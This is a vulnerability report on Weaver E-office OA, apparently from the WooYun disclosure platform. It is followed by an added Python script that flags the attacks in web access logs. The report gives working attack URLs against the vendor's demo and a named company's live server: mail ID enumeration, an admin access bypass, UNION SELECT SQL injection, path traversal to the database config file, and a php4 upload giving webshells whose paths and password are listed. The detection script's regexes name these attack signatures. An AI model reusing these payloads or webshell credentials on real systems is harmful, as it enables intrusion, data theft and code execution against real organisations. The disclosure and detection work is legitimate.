Weaver OA vulnerability set (SQL injection, broken access control, etc.)
0x00: Preamble
None of the vulnerabilities below have been reported before. Do not treat them as duplicates of any existing vulnerability (the vulnerable points are definitely different)!
WooYun: Weaver E-office OA management system, general-type (versatility verified): SQL injection, arbitrary file download, file upload and other vulnerabilities
Each issue is demonstrated on (1) the official demo site and (2) one live case, to show that it is a general-type issue rather than a site-specific one.
The test account on the official demo is Xia Jing; the test account on the case site is Cheng Lin.
0x01: Horizontal privilege bypass allows viewing any user's mail
Problem link: http://www.xxx.com/general/email/new/index.php?EMAIL_ID=7
Problem parameter: EMAIL_ID
Problem description: iterating over the value of the EMAIL_ID parameter shows other users' mail.
(1) official demonstration:
http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9503
http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9504
(2) Case study:
http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726155
http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726152
0x02: Vertical privilege bypass allows direct operations on database tables
Problem link: http://www.xxoo.com/ikernel/admin/
Problem description: after logging in to the OA system, a user can reach the ikernel directory but gets the prompt "no operation permission". Requesting the ikernel/admin/ directory directly, however, allows operations on the table structures and on the tables themselves.
(1) official demonstration:
Some of the displayed information is garbled or hard to read; selecting all the text makes it easier to view.
(2) Case study:
0x03: SQL injection reachable through the vertical privilege bypass
Problem link: http://www.xxx.com/ikernel/admin/IK_TABLE/field?TABLE_ID=9
Problem parameter: TABLE_ID
Problem description: there appear to be many injection points here; only one was chosen for testing. gpc (magic_quotes_gpc) is on, but this parameter is numeric, so it is not affected.
(1) official demonstration:
Get the current database user: http://eoffice8.weaver.cn:8028/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user()
Get the current database name: http://eoffice8.weaver.cn:8028/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20database()
(2) Case study:
Get the current database user: http://www.sjd-logistics.com:8000/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user()
Get the current database name: http://www.sjd-logistics.com:8000/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20database()
0x04: Arbitrary file download vulnerability
Problem link: http://www.xxx.com/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
Problem description: the downloaded file is Zend-encoded and can be decoded online; it contains the database connection settings. Testing showed that the official site's copy of this file is no longer encoded.
(1) official demonstration:
http://eoffice8.weaver.cn:8028/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
(2) Case study:
http://www.sjd-logistics.com:8000/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
0x05: Arbitrary code execution via file upload
Problem link: http://www.xxx.com/general/email/
Problem description: the attachment upload under [Internal mail] - [New mail] accepts the php4 file type (on the official demo the php4 file had to be uploaded by intercepting and modifying the request); viewing the page source reveals the stored file path. The resulting webshell path is http://www.xxx.com/attachment/<directory found in the page source>/<file name>.php4.
(1) official demonstration:
The webshell address obtained: http://eoffice8.weaver.cn:8028/attachment/1915193417/conf1g.php4, password 8
(2) Case study:
The webshell address obtained: http://www.sjd-logistics.com:8000/attachment/950753027/conf1g.php4, password 8
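Each of the request patterns in 0x01 and 0x03 to 0x05 leaves a recognisable trace in the web server's access log. The following added detection script is not part of the original report; it runs four checks over constructed log lines (sample IPs, timestamps and sizes are made up; the paths mirror the endpoints above) and flags the per-request signatures of 0x03, 0x04 and 0x05 plus, statefully, one client walking successive EMAIL_IDs as in 0x01.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed sample access-log lines (not taken from the report); the paths
# mirror the endpoints named in sections 0x01 and 0x03-0x05.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /general/email/new/index.php?EMAIL_ID=9503 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0800] "GET /general/email/new/index.php?EMAIL_ID=9504 HTTP/1.1" 200 498
10.0.0.5 - - [01/Jan/2024:10:00:03 +0800] "GET /general/email/new/index.php?EMAIL_ID=9505 HTTP/1.1" 200 530
10.0.0.5 - - [01/Jan/2024:10:00:04 +0800] "GET /ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user() HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2024:10:00:05 +0800] "GET /general/notify/show/header.php?ATTACHMENT_ID=1&FILE_NAME=../../inc/oa_config.php HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2024:10:00:06 +0800] "GET /attachment/1915193417/conf1g.php4 HTTP/1.1" 200 64
10.0.0.6 - - [01/Jan/2024:10:00:07 +0800] "GET /general/notify/show/header.php?ATTACHMENT_ID=2&FILE_NAME=report.docx HTTP/1.1" 200 4096
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) .*"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SQLI_RE = re.compile(r"union\s+select|\band\s+\d+\s*=\s*\d+", re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
ENUM_THRESHOLD = 3  # distinct EMAIL_IDs from one client before flagging enumeration

def check_request(path, params):
    """Stateless checks for the request patterns in sections 0x03, 0x04 and 0x05."""
    findings = []
    table_id = params.get("TABLE_ID")
    if table_id is not None and (not table_id.isdigit() or SQLI_RE.search(table_id)):
        findings.append("sqli:TABLE_ID")         # 0x03: TABLE_ID must be a bare integer
    file_name = params.get("FILE_NAME", "")
    if ".." in file_name or "/" in file_name or "\\" in file_name:
        findings.append("traversal:FILE_NAME")   # 0x04: a file name has no path parts
    if path.startswith("/attachment/") and SCRIPT_EXT_RE.search(path):
        findings.append("webshell:attachment")   # 0x05: script extension in upload store
    return findings

def scan(log_text):
    """Map 1-based line numbers to findings, adding the stateful 0x01 check."""
    report, seen_ids = {}, {}
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        params = {k: v[0] for k, v in parse_qs(url.query).items()}  # parse_qs URL-decodes
        findings = check_request(url.path, params)
        if "EMAIL_ID" in params:
            ids = seen_ids.setdefault(m.group("ip"), set())
            ids.add(params["EMAIL_ID"])
            if len(ids) >= ENUM_THRESHOLD:      # 0x01: one client walking EMAIL_IDs
                findings.append("idor-enum:EMAIL_ID")
        if findings:
            report[n] = findings
    return report
```

The benign last line (a plain file name in FILE_NAME) is left unflagged, and the EMAIL_ID check fires only once the same client has requested three distinct IDs, so a single legitimate mail view is not reported.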